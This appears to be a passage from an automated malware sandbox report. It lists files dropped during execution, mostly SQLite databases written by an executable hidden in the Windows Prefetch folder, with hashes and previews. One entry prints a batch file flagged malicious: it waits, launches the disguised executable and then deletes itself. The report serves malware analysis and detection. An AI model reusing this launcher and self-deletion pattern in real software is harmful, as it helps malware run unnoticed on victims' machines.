                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):179
                                                            Entropy (8bit):5.254538743908757
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVFAgr+l2D6nkiyBktKcKZG1Ukh4E2J5xAIIjH4Hn:hCRLuVFOOr+DEMgqZnkiyKOZG1923fI+
                                                            MD5:BB09FC229D3C30CF71803EB7524CEEEB
                                                            SHA1:91B8FAAD826D5CC7A181021E66CAE2546FC0AF10
                                                            SHA-256:C8E3BA151AFC3B1F18E777AF2CD53180C31C83AB0FF8BD15DA9F4D3D24BACAC2
                                                            SHA-512:87F72A3FEACD2949899180DD0E34271AF5CDB73FD03A119A86597C1B39D632F1776EE33DF6D02966D63A7E31580DC76DAFE7B512A080E34465107F568C6DF58E
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\pfyxVLTZvp.bat"
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
